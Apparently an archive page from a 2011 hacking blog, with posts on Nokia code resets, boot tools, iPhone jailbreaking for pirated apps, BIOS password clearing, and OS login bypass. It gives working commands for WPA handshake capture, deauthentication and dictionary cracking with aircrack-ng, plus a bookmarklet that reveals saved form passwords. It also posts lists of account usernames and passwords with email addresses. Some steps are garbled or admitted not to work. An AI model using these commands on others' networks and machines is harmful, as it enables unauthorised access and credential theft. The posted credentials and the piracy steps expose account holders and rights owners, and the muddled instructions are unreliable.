Tuesday, March 29, 2011

Forgot your Nokia Phone security Code!!!! Don`t worry..


Have you ever encountered the situation when you may want to just lock your phone or you may want to format your phone ? if yes then this post is for you.
NOTE: The default security code for all Nokia handsets is 12345.
So today i am going to post the way through which you can unlock your nokia phone

Today in this post i am going to share you a trick that will allow to unlock you Nokia Symbian Phones without using any third party software. The secret behind every code is that every phone has unique International Mobile Equipment Identity (IMEI) number and with the help of this number, designed software will calculate a master code for your mobile phone. But i have seen that this work only in some mobile phone not always.

  • Now from the extracted folder copy the THC-NOKIA-UNLOCK.MDL file to Recogs folder.

  • Now remove your memory card from your Nokia Mobile Phone and connect it to system.
  • And find the “system” folder in there.
  • If you cant see the system folder then its hidden, to open it memory card and, type “system” next to your card location as shown in the image below, here in the figure the card is assigned letter H

  • Then you will find yourself inside system folder.

  • Now just copy the Recogs folder from desktop to the system folder in the memory card.

  • After copying the file insert your memory card back to your phone which you want to unlock. As soon as you insert the memory card, it will automatically start the unclocker file resetting the security code.When it succesfully resets your phones code, it will show a message on white screen with, “Press a Key”. Press any key and your code is rested to 12345.
Thats it, your phone is locked.

There are three ways through which you can unloack your nokia phone without knowing the security code.
Method 1. Try the default security code i.e 12345 for all nokia phones.

Method 2. Download the java software from here and install it on nokia java based symbian phone.
Method 3. You can also unlock your nokia phone directly over internet by “Enter your phone IMEI number” by typing the code in the brackets (*#06#) from this website .
So these are all the ways you can use to unlock all nokia  symbian based phone and if you want to know how to unlock other company phones like samsung ,motorola etc. Leave a comment here....
Monday, March 28, 2011

Emergency Boot CD. & Flash Boot.

Emergency Boot CD.

You've probably been in situation when your computer doesn't boot because of software or hardware failure and you lost access to results of your work.

Emergency Boot CD (EBCD) is able to help you. It is a CD-ROM for booting PC and recovering data in emergency situations.
EBCD contains file manager, which is able to process files on FAT, NTFS, EXT3 volumes. All national characters in file names are displayed correctly and preserved when copied. Builtin editor and viewer allows you to work with files in any DOS/Windows encodings, and also UTF-8 and UTF-16.
Using EBCD you can backup your data from IDE, SCSI and SATA fixed disks to USB Flash, FireWire removable devices, or other fixed disks; and restore it when necessary.

EBCD includes Windows Password Wizard, which can be used to restore access to your PC when you forgot the password for Windows user account.
Download link: ebcd-1.1k-demo.iso (12 Mb)

Please check minimal system requirements:
  • CD drive
  • Motherboard/BIOS capable of booting CDs
  • PS/2 or USB mouse and keyboard (legacy COM mice are not supported)
  • 128 Mb of RAM

Limitations of demo version: Demo version can only read from fixed HDDs, it can't write to them. Althrough it can write to USB flash drives and other removable media.

FlashBoot: Install Windows XP/Vista/7 from USB and more

FlashBoot is a tool to convert Windows XP/Vista/7 installation CD/DVD to bootable USB disk, useful for Windows installation on netbooks and other devices without CD/DVD drive. FlashBoot supports USB flash thumbdrives and USB hard disks.
Also, using FlashBoot you can create blank bootable USB flash with minimal set of system files and then manually tune it for your needs, or convert a full-featured bootable CD-ROM or floppy disk to bootable USB Flash keeping all functionality. Different operating systems are supported: Windows 7/Vista, Windows XP, SysLinux-based disks, GRUB4DOS disks, Linux kernel etc.

Latest version of FlashBoot is 2.1c, released on March, 23 of 2011.
Recently "LBA/CHS not available" problem was finally fixed.

Download Demo

Download FlashBoot: flashboot-2.1c-setup.exe [31 Mb].

Limitations of demo version:
  • USB disk or image file is bootable only for 30 days since the date of formatting
  • Each distinct USB disk can be formatted by FlashBoot demo version no more than 16 times
Maximum time of use of demo version is not limited.
Demo version may be upgraded to full version later by copying license key file to FlashBoot folder, there's no need to download big files twice.
It is recommended to try out the demo before buying the full version to ensure that there are no hardware incompatibilities and product meets your particular needs.

System requirements for FlashBoot 2.x:
  • BIOS which supports booting from USB devices
  • Operating system: Windows XP, Windows Vista, Windows 7, Windows Server 2003, Windows Server 2008, either x86 or x64 edition
  • 256 Mbytes of RAM
  • 30 Mbytes of disk space

Portable version for users who don't like installers or need to run FlashBoot from removable media on multiple computers: flashboot-2.1c-portable.zip [30 Mb].
Sunday, March 27, 2011

Password Hacking..


Password Hacking is a process of retrieving or stealing password from data in system or data that is transmitted via system. The most common way of password hacking is guessing password. In this tutorial we will try to cover most commonly used methods used by hackers to hack your passwords.

Password Guessing:
If a hacker wants to hack your password, he may first of all take out all information about you like which is your favorite team, your girlfriend’s/boyfriend’s name, child name etc. whichever matters you most and you can remember easily. Then he creates dictionary of all those words and then tries it one by one against your account. If you want to prevent yourself from password guessing better never keep any guess-able password.

Default Password:
The most common mistake many people do is they never change default password of their accounts/devices. Even before guessing password a hacker may try default passwords only. He can get complete list of default password from www.defaultpassword.com .

Using Brute Force:
In this type of password hacking a hacker attempts to log-in with all possible combination of keys available on keyboard. This is very tedious task and a hacker may give up if he fails to crack that password for several days. Better keep long passwords with all type of characters mixed up in it.

Social Engineering:
An attacker can call as a person of importance or technical support asking for password. Social Engineering works because of human tendency to help and be kind. Whenever someone calls you for or as a technical help and as a person of importance better ask questions before you reveal sensitive information, remember world is not as good as you think. Your tendency to be kind and helpful to someone for no reason for your privacy may put you in serious trouble.

Rainbow Tables:
Rainbow table is dictionary of precompiled hashes of password. An attacker may try to compare hashes recovered from your system to the dictionary of precompiled hashes. If a match is found then that password will work against your account. A good password with characters, special symbols, letters and numbers can not be easily found in any dictionary and hence they will work defensively against hashes dictionary.

In this kind of password hacking an attacker creates a replica of site on which you have an account. Then anyhow he tries to make you click on link to that site and if you get fooled as it is the regular site that you visit and when you enter password he/she logs your password and even gets access to your original account. This is used for hacking email accounts, social networking accounts and even for stealing credit card numbers.
Sniffing Around Network:
Sniffing means capturing data that flows through network. Even if the attacker gets access to password hashes through network he/she can easily crack your password and if proper protection is not provided this password travel as plain text finally revealing your password to attacker without any effort.

Using Spy Software:
A spy software can not be only used to get key logs by can also be used by attacker to eye your networking habits, get complete access to your computer, download, move or delete files from your system and much more.
Thursday, March 24, 2011

Free Premium Accounts…!! { 16 Download Sites}


Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!

Update: Premium Login for Rapidshare.com has been posted here.

1.) www.divxcrawler.com {download movies fastly}
Username : divx273
Password : 8342729

2.) www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}
Username : cinemanetwork20
Password : butterfly20

3.) www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}
Username : lo886Ees
Password : zAgt88er

4.) www.sharingzone.net {movies, Pc softwares, Pc Games}
Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5.) www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}
Username : ga20me
Password : ke01feb

6.) www.watchdirect.tv {movies, music, Pc Games, online Tv}
Username : cinemanetwork20
Password : butterfly20

7.) www.fullreleasez.com {Greatly Every thing}
Username : Af872HskL
Password : XjsdH28N

8.) www.fulldownloads.us {Greatly Every thing}
Username : Af872HskL
Password : XjsdH28N

9.) www.pirateaccess.com {Every thing}
Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5

10.) www.warezquality.com {Every thing}
Username : ageg2020
Password : z8fsDfg3

11.) wwww.warezreleases.com {All Stuff}
Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12.) www.fulldownloadaccess.com {All Stuff}
Username : mpuv3y
Password : umvpy3x

13.) www.alphaload.com {All Stuff}
Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14) www.gamedownloadnow.com {All Stuff}
Username : ga20me
Password : ke01feb

15.) www.unlimiteddownloadcenter.com {All Stuff}
Username : cu20me
Password : ke01feb

16.) www.tvadvanced.com {online Tv}
Username : mv03dl
Password : frmvdl


How to JailBreak Iphone 4G..(Tutorial With Pictures)

Welcome to iHACK....


Step 1: Download the Greenpois0n from http://cache.greenpois0n.com/dl/gp_win32_rc4.zip (if you think this link is infected search google for greenpois0n and download it )

Step 2: Extract and run greenpois0n,then plug in your Apple item.

Step 3: Turn your apple item off

]Step 4: Press “Prepare to Jailbreak (DFU)” button in greenpois0n, you will be guided by Greenpois0n on how to perform next steps.

Step 5: Follow the steps (try being exact),Once you’re in DFU mode, click the ‘Jailbreak!’ button to jailbreak your iPhone.

Step 6: Now, just wait until the status bar shows complete, and your device will reboot to the home screen.

Step 7: You should now have a new “Loader” icon on your springboard. Launch Loader. Select Cydia > Install Cydia.

Step 8: One Cydia has successfully been installed, you will be asked if you want to remove Loader. Hit “Remove” and you iPhone will automatically reboot.You will obtain a "Cydia" icon.

It is JailBreaked :) know lets work on cydia:

-Start “Cydia” on your iPhone.

-Touch on “Manage” tab on the bottom.

-Now touch on “Sources”

-Touch on “Edit” and then on “Add”. You will be prompted to enter a url source as seen in the screenshot below. Type “http://cydia.hackulo.us/” and touch on“Add Source” .

-Know Go and search for "Appsync" and select your version , I used for my Iphone "Appsync for 4.1 os"

-Know Go to itunes on your computer (you should have the apple item ex: iphone plugged into the pc), and download any application , then sync it into your Iphone.

-We are nearly done ,Open cydia and search for Installous 3 (Note : don't choose Install0us the one with "0")

- Open Installous and start downloading apps.
Wednesday, March 23, 2011

Here is the Best way to Crack the BIOS password.


There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….
Tuesday, March 22, 2011

WIFI HACK....WPA Hacking With Video Tutorail- Reloaded [WIFI]


[NOTE: The Information contained in this Article is only Intended for Educational Purposes. I take no Responsibility for the misuse of this information and the harm brought to you or any one else (specially your neighbour.. :)]

Hello Everyone..

How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake

What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power

Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

   airmon-ng start wlan0

airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0

aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0

airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all

aircrack-ng -r crackwpa output*.cap

This is cut from my final video called iHack home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Sub Focus - Rock It
Monday, March 21, 2011

Hack WIFI Password on Iphone 3G-3Gs-4G Genuine


Get free Wifi Password on iphone

easy steps & have fun free Internet on Iphone/Ipod....
1)Install aircrack from this repo:
2) Set EVERY files' permission to 777
3) Open Terminal in WinSCP from /var/
4) enter the following command:
sysctl -w security.mac.proc_enforce=0 security.mac.vnode_enforce=0 /aircrack

5) Go to Ipod mobile
6)Type the following code to activate on the device:
/var/aircrack/aircrack-ng -a 1 /var/aircrack/touch.ivs

If it says killed you didn't do part 4 properly, Good Luck!

(/var/aircrack/aircrack-ng) = the file terminal will open,( -a 1) = the type of encrytption, that is wep, ( /var/aircrack/touch.ivs) = where the packets are saved, this is simply a sample file as it can't capture new packets yet.

NOTE: This DOESN'T work FULLY yet. All this is doing is cracking a sample file supplied with it but can not crack a wifi network on its own yet.

If you like my Av plz Subscribe...

Sunday, March 20, 2011

See Passwords Behind Stars...("********)??

Hello guys,

I am going to show you in a short tutorial how to read out a password of a web browser.



Username: example@gmail.com
Password: **

What's my password?

Alright, now you could read out the **-stuff with a simple javascript code.


javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
All you need is to copy & paste it in the URL-address bar.
Delete http://www.gmail.com and paste the code into it.




In common usage, a hacker is a person who breaks into computers. The subculture that has evolved around hackers is often referred to as the computer underground. Proponents claim to be motivated by artistic and political ends, but are often unconcerned about the use of criminal means to achieve them.
While other uses of the word hacker exist that are not related to computer security (computer programmer and home computer hobbyists), they are rarely used in mainstream context.

Top 20 Best Hacking Tools


Top 20 Best Hacking Tools

The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
Tripwire is a tool that can be used for data and program integrity assurance.
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.
IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
OpenBSD Packet Filter
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann

How to Hack Password of any Operating System


One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems. Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.


Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful program is Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.
Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.
The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.
You can download OphCrack from the following link:


Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.
To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.
You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.


Finally we take on Mac’s OS X which as we said earlier is based on Unix and is difficult to change password compared to Linux but nothing is impossible to be hacked.
The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.
If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in.
If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:
fsck -fy
mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/UserName newpassword
That’s it. Now that the password is reset, you can login.